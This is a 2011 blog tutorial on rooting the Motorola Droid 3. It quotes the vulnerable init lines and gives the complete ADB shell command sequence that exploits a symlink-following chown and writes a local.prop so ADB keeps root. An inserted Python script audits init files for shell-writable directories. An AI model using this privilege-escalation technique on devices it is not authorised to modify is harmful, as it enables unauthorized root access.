
How To Root Your Motorola Droid 3

Posted by techhackz-admin Friday, September 2, 2011


The Motorola Droid 3 has finally been rooted, and it didn’t even require the developer to physically access a Motorola Droid 3 device… quite impressive. While auditing the Droid 3, Dan Rosenberg found that the contents of /data/local were owned by group “shell” and were group-writable, and all it took to root the device was to modify some of that directory's contents using adb. Find out more after the break.
Disclaimer: Please note that we will not be responsible if you end up bricking your device. Rooting or customizing your device can be risky; if you follow the instructions you should be fine!
Again, all the credit goes to Dan Rosenberg (djrbliss) for identifying the security vulnerability and writing the exploit.
Here is a quick explanation from the developer of the security hole [from Rooting the Droid 3]:
I identified a vulnerability specific to Motorola devices in the script parsed by the init thread (this is existing code, not commands for you to run):
    mkdir /data/local 0771 mot_tcmd shell
    mkdir /data/local/tmp 0771 mot_tcmd shell
    mkdir /data/local/12m 0771 mot_tcmd shell
    mkdir /data/local/12m/batch 0771 mot_tcmd shell
    chown mot_tcmd shell /data/local
    chown mot_tcmd shell /data/local/12m
    chown mot_tcmd shell /data/local/12m/batch
    chown mot_tcmd shell /data/local/tmp
Since the contents of /data/local are group “shell” and group-writable, we can modify the contents of this directory using ADB. If we log into the device and replace one of the sub-directories listed here with a symbolic link, then when the device reboots it will change the ownership of the symlink target to group “shell”. This can be used to edit property files to manipulate the behavior of ADB to achieve root.
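As an added example (not part of the original post or Dan Rosenberg's write-up), here is a small Python audit that parses init.rc-style mkdir/chown lines like the ones quoted above and flags directories that an unprivileged ADB shell user could write into. The sample init snippet is constructed from the quoted lines plus one unrelated control line; the default mode of 0755 for a mkdir with no mode argument follows Android init's documented behaviour.

```python
"""Audit init.rc-style lines for group-writable directories handed to group "shell"."""
import stat

# Constructed sample: the Motorola lines quoted above plus one non-shell directory.
SAMPLE_INIT = """\
mkdir /data/local 0771 mot_tcmd shell
mkdir /data/local/tmp 0771 mot_tcmd shell
mkdir /data/local/12m 0771 mot_tcmd shell
mkdir /data/local/12m/batch 0771 mot_tcmd shell
mkdir /data/misc 01771 system misc
chown mot_tcmd shell /data/local
chown mot_tcmd shell /data/local/12m
"""

def _new_entry():
    # Android init creates directories as 0755 root:root when no arguments are given.
    return {"mode": 0o755, "user": "root", "group": "root"}

def parse_init(text):
    """Return {path: {"mode": int, "user": str, "group": str}} from mkdir/chown lines.

    Handles 'mkdir <path> [mode] [user] [group]' and 'chown <user> <group> <path>';
    a later chown overrides the ownership set by an earlier mkdir, as init would.
    """
    dirs = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0] == "mkdir" and len(parts) >= 2:
            entry = dirs.setdefault(parts[1], _new_entry())
            if len(parts) >= 3:
                entry["mode"] = int(parts[2], 8)   # modes are octal, e.g. 0771 or 01771
            if len(parts) >= 4:
                entry["user"] = parts[3]
            if len(parts) >= 5:
                entry["group"] = parts[4]
        elif parts[0] == "chown" and len(parts) == 4:
            entry = dirs.setdefault(parts[3], _new_entry())
            entry["user"], entry["group"] = parts[1], parts[2]
    return dirs

def shell_writable_dirs(text, untrusted_groups=("shell",)):
    """Paths whose group write bit is set and whose group an ADB shell user belongs to.

    Any such directory lets the shell user rename entries and plant symlinks that a
    later privileged chown in the same script will follow.
    """
    return sorted(path for path, e in parse_init(text).items()
                  if e["mode"] & stat.S_IWGRP and e["group"] in untrusted_groups)
```

Running shell_writable_dirs(SAMPLE_INIT) reports the four /data/local directories and not /data/misc, whose group is not one the ADB shell user holds.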

Once the vulnerability was found it became quite easy to actually root / jailbreak the Motorola Droid 3 using ADB [from Rooting the Droid 3]:
Log in to the device using “adb shell” and type the following commands:
mv /data/local/12m /data/local/12m.bak
ln -s /data /data/local/12m
Next, physically reboot the device by pressing the power button. When it wakes up, log in using “adb shell” again, and type the following:
rm /data/local/12m
mv /data/local/12m.bak /data/local/12m
mv /data/local.prop /data/local.prop.bak
echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop
echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop
echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop
echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop
echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop
echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop
echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop
echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop
echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop
echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.prop
The ro.sys.atvc_allow_all_adb property is a Motorola-specific configuration that prevents ADB from dropping its root privileges. Reboot the device one final time, and on logging in with “adb shell”, you should be presented with a root prompt. Enjoy!
